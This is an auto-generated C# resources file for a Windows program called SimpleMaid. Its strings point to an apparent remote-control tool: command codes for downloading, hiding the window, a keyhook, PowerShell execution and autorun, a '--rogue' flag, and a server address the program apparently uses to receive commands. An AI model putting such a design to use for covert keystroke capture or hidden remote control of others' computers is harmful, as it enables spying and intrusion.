//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace SimpleMaid {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SimpleMaid.resources", typeof(resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to None.
        /// </summary>
        internal static string AccountCredentials {
            get {
                return ResourceManager.GetString("AccountCredentials", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to You shouldn&apos;t run this app as administrator. Don&apos;t risk your PC! (:.
        /// </summary>
        internal static string AdminErrorMessage {
            get {
                return ResourceManager.GetString("AdminErrorMessage", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to A: .
        /// </summary>
        internal static string AnswerPrefix {
            get {
                return ResourceManager.GetString("AnswerPrefix", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to --autorun.
        /// </summary>
        internal static string AutorunArgument {
            get {
                return ResourceManager.GetString("AutorunArgument", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Exit.
        /// </summary>
        internal static string btnBidFarewell_Text {
            get {
                return ResourceManager.GetString("btnBidFarewell_Text", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Send message.
        /// </summary>
        internal static string btnSendLetter_Text {
            get {
                return ResourceManager.GetString("btnSendLetter_Text", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Chat thread has started..
        /// </summary>
        internal static string ChatStart {
            get {
                return ResourceManager.GetString("ChatStart", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Chat thread has stopped..
        /// </summary>
        internal static string ChatStop {
            get {
                return ResourceManager.GetString("ChatStop", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to ;.
        /// </summary>
        internal static string CommandsSeparator {
            get {
                return ResourceManager.GetString("CommandsSeparator", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Command thread has started..
        /// </summary>
        internal static string CommandStart {
            get {
                return ResourceManager.GetString("CommandStart", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Command thread has stopped..
        /// </summary>
        internal static string CommandStop {
            get {
                return ResourceManager.GetString("CommandStop", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Configuration.ini.
        /// </summary>
        internal static string ConfigName {
            get {
                return ResourceManager.GetString("ConfigName", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Connection thread has started..
        /// </summary>
        internal static string ConnectionStart {
            get {
                return ResourceManager.GetString("ConnectionStart", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Connection thread has stopped..
        /// </summary>
        internal static string ConnectionStop {
            get {
                return ResourceManager.GetString("ConnectionStop", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to ..
        /// </summary>
        internal static string DefaultPassword {
            get {
                return ResourceManager.GetString("DefaultPassword", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to d.
        /// </summary>
        internal static string DownloadCommand {
            get {
                return ResourceManager.GetString("DownloadCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to eval&lt;.
        /// </summary>
        internal static string EvaluateCmdVariable {
            get {
                return ResourceManager.GetString("EvaluateCmdVariable", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to &gt;.
        /// </summary>
        internal static string EvaluateCmdVariableEnd {
            get {
                return ResourceManager.GetString("EvaluateCmdVariableEnd", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to 2000.
        /// </summary>
        internal static string GeneralCloseDelay {
            get {
                return ResourceManager.GetString("GeneralCloseDelay", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to OK!.
        /// </summary>
        internal static string GeneralOKMessage {
            get {
                return ResourceManager.GetString("GeneralOKMessage", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to h.
        /// </summary>
        internal static string HideCommand {
            get {
                return ResourceManager.GetString("HideCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to One good turn deserves another..
        /// </summary>
        internal static string IncompleteCommandErrMsg {
            get {
                return ResourceManager.GetString("IncompleteCommandErrMsg", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to 500.
        /// </summary>
        internal static string IndividualValueLimit {
            get {
                return ResourceManager.GetString("IndividualValueLimit", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to k.
        /// </summary>
        internal static string KeyhookCommand {
            get {
                return ResourceManager.GetString("KeyhookCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to d.
        /// </summary>
        internal static string KeywordDefault {
            get {
                return ResourceManager.GetString("KeywordDefault", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to --lang.
        /// </summary>
        internal static string LanguageArgument {
            get {
                return ResourceManager.GetString("LanguageArgument", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to :.
        /// </summary>
        internal static string MachinesDelimiter {
            get {
                return ResourceManager.GetString("MachinesDelimiter", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to m.
        /// </summary>
        internal static string MessageCommand {
            get {
                return ResourceManager.GetString("MessageCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to What did you do?!.
        /// </summary>
        internal static string OldnewErrorMessage {
            get {
                return ResourceManager.GetString("OldnewErrorMessage", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to This app only suports Windows, sorry..
        /// </summary>
        internal static string OSErrorMessage {
            get {
                return ResourceManager.GetString("OSErrorMessage", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to --pass.
        /// </summary>
        internal static string PasswordArgument {
            get {
                return ResourceManager.GetString("PasswordArgument", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Please, setup a password: .
        /// </summary>
        internal static string PasswordEnterTip {
            get {
                return ResourceManager.GetString("PasswordEnterTip", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to 500.
        /// </summary>
        internal static string PasswordWeakDelay {
            get {
                return ResourceManager.GetString("PasswordWeakDelay", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Too weak..
        /// </summary>
        internal static string PasswordWeakHint {
            get {
                return ResourceManager.GetString("PasswordWeakHint", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to What else can you be when the world can only see a MONSTER?.
        /// </summary>
        internal static string PastSins {
            get {
                return ResourceManager.GetString("PastSins", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to p.
        /// </summary>
        internal static string PowershellCommand {
            get {
                return ResourceManager.GetString("PowershellCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to q.
        /// </summary>
        internal static string QuitCommand {
            get {
                return ResourceManager.GetString("QuitCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to r.
        /// </summary>
        internal static string RepeatCommand {
            get {
                return ResourceManager.GetString("RepeatCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to --rogue.
        /// </summary>
        internal static string RogueArgument {
            get {
                return ResourceManager.GetString("RogueArgument", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to http://apptinywebdb.appspot.com.
        /// </summary>
        internal static string ServerAddress {
            get {
                return ResourceManager.GetString("ServerAddress", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to s.
        /// </summary>
        internal static string ShowCommand {
            get {
                return ResourceManager.GetString("ShowCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Time thread has started..
        /// </summary>
        internal static string TimeStart {
            get {
                return ResourceManager.GetString("TimeStart", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Problem connecting to server. Check your internet connection..
        /// </summary>
        internal static string WebErrorMessage {
            get {
                return ResourceManager.GetString("WebErrorMessage", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to A typo: .
        /// </summary>
        internal static string WrongCommandErrMsg {
            get {
                return ResourceManager.GetString("WrongCommandErrMsg", resourceCulture);
            }
        }
    }
}
